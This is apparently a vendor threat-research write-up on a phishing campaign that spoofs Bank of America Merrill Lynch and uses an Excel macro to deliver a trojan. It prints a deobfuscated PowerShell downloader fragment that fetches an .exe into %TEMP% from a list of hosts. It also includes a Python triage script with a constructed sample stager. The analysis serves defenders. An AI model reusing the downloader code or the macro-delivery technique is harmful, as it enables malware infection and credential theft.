New Phishing campaign targets Bank of America Merrill Lynch customers

SonicWall has recently spotted a new Bank of America phishing campaign. The scam email claims to come from Bank of America Merrill Lynch but carries a malicious Excel attachment. The Excel document contains VBA macros which, when enabled, download and run a malicious Win32.Trojan payload.

Infection Cycle:

Phishing email is now the most effective attack vector, as exploit kits are no longer attackers' preferred delivery method. In this phishing campaign, Bank of America Merrill Lynch customers are being targeted with a custom attack. All these fake emails come from the domain ‘’ rather than the real ‘’. The sender in these emails pretends to be a real Bank of America employee; an online profile with the same name shows a person working at a southern California branch. However, the Newport branch address and phone number in the email do not match.

Upon launching the Excel attachment, a prompt appears with the message “If you have problems viewing/loading document content please select “Enable Editing” and then “Enable Content” button”. Once content is enabled, the macro downloads a malicious payload, which begins executing immediately.

The VBA project is password-protected.

After unlocking the VBA project by tweaking the binary, we see the form (shown below) with encoded values in its fields.

VBA code:

The VBA code is highly obfuscated to evade static, signature-based detection. It contains the logic to retrieve the shell code from the form above.

Shell Code:

The retrieved shell code is pasted below. It is a gzip-compressed, base64-encoded string.


After base64 decoding and decompressing the shell code above, we get the function below, which downloads the malicious payload from either hxxp:// or ‘hxxp://’.

function <#release#> tisel([string] $stri1) {
  # <#exim#> is an inline comment used to split the type name; the type name itself is not shown in this excerpt
  (new-object <#exim#> ).downloadfile($stri1,$env:temp+'\tmp0281.exe');
  return $tos1;   # $tos1 is set elsewhere in the script (not shown in this excerpt)
}

foreach ($rix in $men1) {   # $men1 holds the list of download hosts (not shown in this excerpt)
  if(tisel('http://'+$rix) -eq 1){
    # remainder of the loop body is not shown in this excerpt
  }
}

Hence, once the VBA macro is enabled in the Excel document, a shell command executes that invokes a fileless PowerShell script to download and run the malicious file.
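As an added example (not the page's or SonicWall's code), a Python triage helper for a stager of this kind: it base64-decodes the blob, gunzips it only when the gzip magic bytes are present, strips the <#...#> inline comments the macro uses to split tokens, and flags the WebClient-download-to-%TEMP% pattern. The sample script and indicator names are constructed for this example; the download host is a placeholder.

```python
import base64
import gzip
import re

# The stager hides tokens behind inline block comments such as <#release#>;
# strip them before matching so the split tokens rejoin.
INLINE_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)

# Constructed indicators for the stager shape in this analysis: a WebClient
# download into %TEMP%, an .exe drop, and a loop over fallback hosts.
INDICATORS = {
    "webclient_download": re.compile(r"downloadfile\s*\(", re.IGNORECASE),
    "temp_drop": re.compile(r"\$env:temp", re.IGNORECASE),
    "exe_drop": re.compile(r"\.exe['\"]", re.IGNORECASE),
    "host_loop": re.compile(r"foreach\s*\(", re.IGNORECASE),
    "http_url": re.compile(r"'https?://'", re.IGNORECASE),
}

def decode_stage(blob: str) -> str:
    """Base64-decode a stager; gunzip only when the gzip magic bytes are present."""
    raw = base64.b64decode(blob)
    if raw[:2] == b"\x1f\x8b":
        raw = gzip.decompress(raw)
    return raw.decode("utf-8", errors="replace")

def encode_stage(script: str, compress: bool = True) -> str:
    """Build a gzip+base64 (or base64-only) blob; used here to construct sample input."""
    data = script.encode("utf-8")
    return base64.b64encode(gzip.compress(data) if compress else data).decode("ascii")

def deobfuscate(script: str) -> str:
    return INLINE_COMMENT.sub("", script)

def triage(script: str) -> dict:
    """Return indicator hits and a verdict for a decoded PowerShell stager."""
    clean = deobfuscate(script)
    hits = {name: bool(pat.search(clean)) for name, pat in INDICATORS.items()}
    downloader = hits["webclient_download"] and hits["temp_drop"]
    hits["verdict"] = "downloader" if downloader else "review"
    return hits

# Constructed sample mirroring the decoded stager's shape; the host is a placeholder.
SAMPLE_SCRIPT = (
    "function <#release#> tisel([string] $stri1) {\n"
    "  (new-object <#exim#> net.webclient).downloadfile($stri1,$env:temp+'\\tmp0281.exe');\n"
    "  return 1 }\n"
    "foreach ($rix in @('PLACEHOLDER-HOST/stage2')) { if(tisel('http://'+$rix) -eq 1){ break } }\n"
)
SAMPLE_BLOB = encode_stage(SAMPLE_SCRIPT)
```

Run `triage(decode_stage(SAMPLE_BLOB))` to see the hits; a blob that is base64 only (no gzip header) decodes through the same function.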

The payload exhibits the following behaviors:

  • Stops and deletes the Windows Defender service
  • Creates a scheduled task that runs it every 10 minutes
  • Injects itself into the whitelisted process ‘svchost.exe’
  • Communicates with the C&C server periodically

Threat Graph:

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

  • GAV: Downloader.HWB (Trojan)
  • GAV: MalAgent.H_13330 (Trojan)

Payload Url:

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.